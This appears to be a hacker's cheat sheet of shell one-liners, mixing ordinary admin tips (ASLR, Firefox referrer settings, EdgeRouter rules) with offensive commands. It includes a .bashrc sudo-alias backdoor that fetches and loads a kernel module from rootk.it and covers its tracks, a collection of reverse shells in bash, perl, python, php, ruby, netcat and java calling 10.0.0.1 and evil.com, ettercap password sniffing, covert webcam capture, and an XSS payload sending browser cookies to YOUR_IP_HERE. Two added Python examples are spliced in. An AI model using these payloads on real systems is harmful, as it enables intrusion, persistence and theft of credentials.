Script Crypt


Backdoor via sudo

echo "alias sudo='wget -qO1.ko http://rootk.it/1; sudo insmod 1.ko; rm -f 1.ko; sed -i /sudo/d ~/.bashrc; sudo'" >>~/.bashrc

sed cleans after itself

Check and disable ASLR

To check:
cat /proc/sys/kernel/randomize_va_space
To disable:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Controlling Firefox referrer

For dynamic referrer control, with the ability to whitelist some sites, try the “Smart Referer” plugin.

To disable the Firefox referrer

about:config - network.http.sendRefererHeader set to 0

To change and control Firefox’s referrer

network.http.referer.XOriginPolicy: 0=always send, 1=send if base domains match, 2=send if hosts match
network.http.referer.spoofSource: false=real referer, true=spoof referer (use target URI as referer)
network.http.referer.trimmingPolicy: 0=send full URI, 1=scheme+host+port+path, 2=scheme+host+port

Referrer processing is done in this order. Thus, setting XOriginPolicy to 2 makes spoofSource and trimmingPolicy irrelevant when going from a.example.com to b.example.com, since no referrer would be sent anyway because of the XOriginPolicy.

If using the three new prefs, I’d suggest setting the old network.http.sendRefererHeader to 2 (the default: always send the referrer).

See https://bugzilla.mozilla.org/show_bug.cgi?id=822869

How to list firefox cookies in curl-wget format

Note that they may be locally obfuscated and you would need to decrypt them first. The fields have to be tab-separated for curl and wget to read the file:
sqlite3 -separator $'\t' $HOME/.mozilla/firefox/*/cookies.sqlite "select host, case substr(host,1,1)='.' when 0 then 'FALSE' else 'TRUE' end, path, case isSecure when 0 then 'FALSE' else 'TRUE' end, expiry, name, value from moz_cookies;"

Detect passwords in sniffed traffic

datalog=$(date)
sudo ufw disable
sudo ettercap -Tzq -i wlan0 -l "$datalog"
sudo ufw enable
sudo etterlog -a "$datalog".eci
sudo chown me:me "$datalog".eci

Find all DLLs for a service

@echo off
rem Usage: this script takes the service name as %1 and needs Dependency Walker's depends.exe on the PATH
set imagepath=
rem reg query prints the value name as "ImagePath", so find needs /I; tokens=3 keeps only the first
rem word of the value, so an unquoted path containing spaces or trailing arguments gets cut off
FOR /F "tokens=3" %%a in ('reg query HKLM\system\currentcontrolset\services\%1 /v imagepath 2^> nul ^| find /I "imagepath" ') DO set imagepath=%%a
if defined imagepath (
	echo Dependencies for %imagepath%:
	call depends /a0f1c /oc:~svcdep.tmp "%imagepath%"
	rem each module in the CSV sits on a line starting with ","; drop the unresolved ("?") ones
	FOR /F "tokens=1 delims=, skip=1" %%b in ('type ~svcdep.tmp ^|findstr /B /c:"," ^|findstr /V /c:"?" ^| sort') do echo %%b
	del ~svcdep.tmp 2>nul
) else (
	echo '%1' is not installed or is not a valid service
)

Generate random MAC

MACADDR="52:54:00:$(dd if=/dev/urandom bs=512 count=1 2>/dev/null | md5sum | sed 's/^\(..\)\(..\)\(..\).*$/\1:\2:\3/')"; echo $MACADDR

Get binary opcodes for C code

gcc -fno-inline -Os -c code.c
objdump -d code.o -M intel |grep "^ " |cut -f2

To get them in Python format:
for i in $(objdump -d code.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;

Get first 10 search results from Google

#!/bin/bash
Q="$@"
URL='https://www.google.com/search?tbs=li:1&q='
AGENT="Mozilla/4.0"
stream=$(curl -A "$AGENT" -skLm 10 "${URL}${Q//\ /+}" | grep -oP '\/url\?q=.+?&amp' | sed 's|/url?q=||; s|&amp||')
echo -e "${stream//\%/\x}"

Hex in command line or transfer binary as text

python -c "print '1'*8+'\x00\x32'"
or
echo -ne '\x00\x06\x30\x30\x30\x30\x4e\x43'
or
echo '0006303030304e43' | xxd -r -p
If you have a string of hexadecimals you can convert it to an escaped sequence with sed:
echo '0006303030304e43' | sed -e 's/../\\x&/g'

od -An -vtx1 Check.tar > Check.txt
then either
LC_ALL=C tr -cd 0-9a-fA-F < Check.txt | xxd -r -p > Check.tar
or
perl -ape '$_=pack "(H2)*", @F' Check.txt > Check.tar

Also: xxd, hexdump, uuencode/uudecode.

Netscape cookie file format

  • domain - The domain that created AND that can read the variable.
  • flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
  • path - The path within the domain that the variable is valid for.
  • secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed.
  • expiration - The UNIX time that the variable will expire on.
  • name - The name of the variable.
  • value - The value of the variable.
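An added example (not the page's own code) covering both the Firefox export above and this format: it writes moz_cookies rows as tab-separated Netscape lines, derives the flag field from the leading dot, marks HttpOnly cookies with the #HttpOnly_ domain prefix curl uses, and parses such lines back. The in-memory sqlite table is constructed test data; the isHttpOnly column name is assumed alongside the columns the sqlite3 one-liner uses.

```python
"""Netscape cookie-file writer/parser fed from a moz_cookies-shaped table.
Added example, not the page's own code; the sqlite rows are constructed."""
import sqlite3

def netscape_line(host, path, is_secure, is_http_only, expiry, name, value):
    """Seven tab-separated fields: domain, flag, path, secure, expiry, name, value.
    flag is TRUE for domain cookies (host starts with '.'); curl marks HttpOnly
    cookies by prefixing the domain field with '#HttpOnly_'."""
    domain = ("#HttpOnly_" if is_http_only else "") + host
    flag = "TRUE" if host.startswith(".") else "FALSE"
    secure = "TRUE" if is_secure else "FALSE"
    return "\t".join([domain, flag, path, secure, str(int(expiry)), name, value])

def export_firefox_cookies(conn):
    """moz_cookies rows -> list of Netscape lines, one per cookie."""
    rows = conn.execute("SELECT host, path, isSecure, isHttpOnly, expiry, name, value "
                        "FROM moz_cookies")
    return [netscape_line(*row) for row in rows]

def parse_netscape_line(line):
    """Parse one line; blank lines and comments (except the HttpOnly marker) give None."""
    line = line.rstrip("\n")
    http_only = line.startswith("#HttpOnly_")
    if http_only:
        line = line[len("#HttpOnly_"):]
    elif not line.strip() or line.startswith("#"):
        return None
    fields = line.split("\t")
    if len(fields) != 7:
        raise ValueError("expected 7 tab-separated fields, got %d" % len(fields))
    domain, flag, path, secure, expiry, name, value = fields
    return {"domain": domain, "flag": flag == "TRUE", "path": path,
            "secure": secure == "TRUE", "http_only": http_only,
            "expiry": int(expiry), "name": name, "value": value}

def build_sample_db():
    """Constructed stand-in for cookies.sqlite (only the columns used above; isHttpOnly assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE moz_cookies (host TEXT, path TEXT, isSecure INTEGER, "
                 "isHttpOnly INTEGER, expiry INTEGER, name TEXT, value TEXT)")
    conn.executemany("INSERT INTO moz_cookies VALUES (?,?,?,?,?,?,?)", [
        (".example.com", "/", 1, 1, 1900000000, "session", "abc123"),
        ("login.example.com", "/account", 0, 0, 1900000000, "pref", "dark"),
    ])
    return conn

if __name__ == "__main__":
    for cookie_line in export_firefox_cookies(build_sample_db()):
        print(cookie_line)
```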

Check what wifi channels are used in your neighbourhood

sudo iwlist wlan0 scan | grep Frequency | sort | uniq -c | sort -n

List listening services

sudo netstat -plunt

Block YouTube on an EdgeRouter X

Use an auto-populating group to collect all YouTube IPs:

firewall {
    group {
        address-group YOUTUBE {
        }
    }
    name LAN_IN {
        default-action accept
        description ""
        rule 1 {
            action drop
            description BlockYoutube
            destination {
                group {
                    address-group YOUTUBE
                }
            }
            log disable
            protocol all
        }
    }
}
interfaces {
    ethernet eth0 {
        description LAN
        address 192.168.33.1/24
        firewall {
            in {
                name LAN_IN
            }
        }
        duplex auto
        speed auto
    }
}
service {
    dns {
        forwarding {
            cache-size 150
            listen-on switch0.33
            name-server 8.8.8.8
            options ipset=/youtube.com/YOUTUBE
        }
    }
}

Another way is to block via DNS:
set service dns forwarding options address=/.youtube.com/216.239.38.120
set service dns forwarding options address=/.otherstuff.com/216.239.38.120

How to copy ssh key when password login is disabled

cat ~/.ssh/user_rsa.pub | ssh -i ~/.ssh/root_rsa root@ip.ip.ip.ip "su user -c \"mkdir ~/.ssh; chmod 700 ~/.ssh/; tee -a /home/user/.ssh/authorized_keys\""

How to extract ssl cert off a server

echo | openssl s_client -connect www.server.com:443 2>/dev/null | openssl x509 -text

How to get your external IP

curl icanhazip.com
curl ifconfig.co

Network recon

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

cat /etc/resolv.conf
cat /etc/networks
iptables -L
hostname
dnsdomainname

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

arp -e
route
/sbin/route -nee

tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.5.5.252 and dst port 21))'

Parse syslog for blocked external scans

grep "UFW BLOCK" /var/log/syslog| sed -n 's/.*SRC=\([^ ]*\).*DST=\([^ ]*\).*PROTO=\([^ ]*\).*SPT=\([^ ]*\).*DPT=\([^ ]*\).*/\3 \1:\4->\2:\5/p'
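An added example (not from the page) in Python that does the same extraction as the sed one-liner over a few constructed UFW BLOCK syslog lines, copes with ICMP entries that carry no SPT/DPT (which the sed silently skips), and then groups the blocked hits per source to flag hosts that probed several destination ports:

```python
"""Parse UFW BLOCK lines from syslog and flag multi-port probes.
Added example; the log lines below are constructed, not real traffic."""
import re
from collections import defaultdict

# Constructed sample in the shape UFW writes to /var/log/syslog (RFC 5737 test addresses).
SAMPLE_SYSLOG = """\
Mar  1 10:00:01 gw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:00:00:00:00:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=40 TTL=244 ID=1 PROTO=TCP SPT=41000 DPT=22 WINDOW=1024 SYN URGP=0
Mar  1 10:00:02 gw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=40 TTL=244 ID=2 PROTO=TCP SPT=41001 DPT=23 WINDOW=1024 SYN URGP=0
Mar  1 10:00:02 gw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=40 TTL=244 ID=3 PROTO=TCP SPT=41002 DPT=80 WINDOW=1024 SYN URGP=0
Mar  1 10:00:03 gw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=40 TTL=244 ID=4 PROTO=TCP SPT=41003 DPT=443 WINDOW=1024 SYN URGP=0
Mar  1 10:00:05 gw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=60 TTL=52 ID=5 PROTO=UDP SPT=5353 DPT=5353 LEN=40
Mar  1 10:00:06 gw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=84 TTL=52 ID=6 PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Mar  1 10:00:07 gw sshd[100]: Accepted publickey for me from 192.0.2.50 port 50000
"""

# Same KEY=value fields the sed expression pulls out of each line.
FIELD = re.compile(r"\b(SRC|DST|PROTO|SPT|DPT)=(\S+)")

def parse_block(line):
    """Return {'src','dst','proto','spt','dpt'} for a UFW BLOCK line, else None.
    ICMP lines have no SPT/DPT, so those keys default to None instead of failing."""
    if "[UFW BLOCK]" not in line:
        return None
    fields = dict(FIELD.findall(line))
    if not {"SRC", "DST", "PROTO"}.issubset(fields):
        return None
    return {"src": fields["SRC"], "dst": fields["DST"], "proto": fields["PROTO"],
            "spt": fields.get("SPT"), "dpt": fields.get("DPT")}

def format_block(rec):
    """Same 'PROTO SRC:SPT->DST:DPT' shape the sed one-liner prints."""
    return "%s %s:%s->%s:%s" % (rec["proto"], rec["src"], rec["spt"], rec["dst"], rec["dpt"])

def find_port_scanners(text, min_ports=3):
    """Sources whose blocked packets hit at least min_ports distinct (proto, port) pairs."""
    hits = defaultdict(set)
    for line in text.splitlines():
        rec = parse_block(line)
        if rec and rec["dpt"] is not None:
            hits[rec["src"]].add((rec["proto"], int(rec["dpt"])))
    return {src: sorted(p for _, p in h) for src, h in hits.items() if len(h) >= min_ports}

if __name__ == "__main__":
    for raw in SAMPLE_SYSLOG.splitlines():
        rec = parse_block(raw)
        if rec:
            print(format_block(rec))
    print(find_port_scanners(SAMPLE_SYSLOG))
```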

Reverse shells

Socat

Listener on your machine (connects a TCP socket, which is listening, to your current TTY):
socat file:`tty`,raw,echo=0 tcp-listen:8999
Run this one on the host whose terminal you want; it connects the bash process to your TCP listener:
./socat tcp-connect:my.pc.ip.address:8999 exec:'bash -li',pty,stderr,setsid,sigint,sane
Now you have a fully functional TTY terminal connected to your shell.

Forward shell. Server:
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
Client:
socat FILE:`tty`,raw,echo=0 TCP:localhost:1337

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Or, on the server you’re connecting from:
nc -l -p 8080 -vvv
The client:
exec 5<>/dev/tcp/evil.com/8080
cat <&5 | while read line; do $line 2>&5 >&5; done

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 1234
or
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

XTerm

xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X server (:1, which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
On the server, allow the IP:
xhost +targetip

Send binary payload over netcat

echo -e "$(for i in $(objdump -d shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;)" | netcat ip port

Sniff and dump network traffic

Dump to pcap-ng (use -P to dump in the earlier libpcap format), then convert for chaosreader:
dumpcap -i wlan0 -w file.cap
Pcap-NG (aka NTAR) allows for more advanced features than the old libpcap (aka PCAP) format, such as multiple interface types and annotations.
Or use tcpdump to dump directly to libpcap format:
tcpdump -i wlan0 -s 65535 -w wlancap.cap
Convert from PcapNG to PCAP:
editcap -F libpcap <infile> <outfile>
Parse out streams and data. Interesting stuff:
chaosreader -nd -m 1k --dir <export dir> <capturefile.libpcap>
Everything in multiple formats (will be big):
chaosreader -ndve --dir <export dir> <capturefile.libpcap>

-n use http names in the report
-d resolve via DNS knowledge
-r include raw files (will dump HTTPS as well)
-v verbose output
-e spit everything
-m 1k Ignore streams smaller than 1k

Then remove redundant files:
rm *.hex.*
find . -size 0 -delete
/usr/share/fslint/fslint/findup -d
rm session_*.html
rm stream_*.html

(.info and .raw have all the info in a more readable format)

http://www.informationelle-selbstbestimmung-im-internet.de/chaosreader.html

Spawn shells

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
vi :!bash

Take screenshots remotely

while true; do
sudo cat /dev/input/mouse0 | read -n1
mpv tv:// -frames 3 -vo jpeg
mv 00000003.jpg `date +%F-%H-%M`.jpg
rm -f 0000*.jpg
sleep 10
done

mencoder tv:// -tv driver=v4l2:width=800:height=600:device=/dev/video0:fps=30:outfmt=yuy2:forceaudio:alsa:adevice=hw.2,0 -ovc lavc -lavcopts vcodec=mpeg4:vbitrate=1800 -ffourcc xvid -oac mp3lame -lameopts cbr=128 -o video.avi

ffmpeg -f x11grab -r 25 -s 1366x768 -i :0.0 screencast.mpg

Transfer files with a clipboard

base64 file.zip | clip
base64 --decode -o file.zip

You can paste directly into stdin and press ctrl-d at the end.

Transfer files with nc

cat backup.iso | nc -l 3333
cat backup.iso | pv -b | nc -l 3333
dd if=/dev/hdb5 | gzip -9 | nc -l 3333
tar -czf - /etc/ | nc -l 3333

nc 192.168.0.1 3333 > backup.iso
nc 192.168.0.1 3333 | pv -b > backup.iso

ssh -f -L 23333:127.0.0.1:3333 me@192.168.0.1 sleep 10; nc 127.0.0.1 23333 | pv -b > backup.iso

How to serve file on port 80 with nc

while ( nc -l 80 < file.html > /dev/null ) ; do : ; done

Using browser cookies

Chrome cookie encryption was introduced here:
https://codereview.chromium.org/24734007/#ps3001001
https://cs.chromium.org/search/?q=saltysalt+package:%5Echromium$&type=cs
Perhaps the easiest way to view your cookies in Chrome is to visit chrome://settings/cookies

View image metadata

exiftool myPhoto.jpg
or
identify -verbose myPhoto.jpg

XSS cookie collector

On the cnc:
nc -cnlp 8000
Payload:
<script>document.write(%27<img src=http://YOUR_IP_HERE:8000/collect.gif?cookie=%27%2bdocument.cookie%2b%27/>%27)</script>

Licensed under CC BY-NC-SA 4.0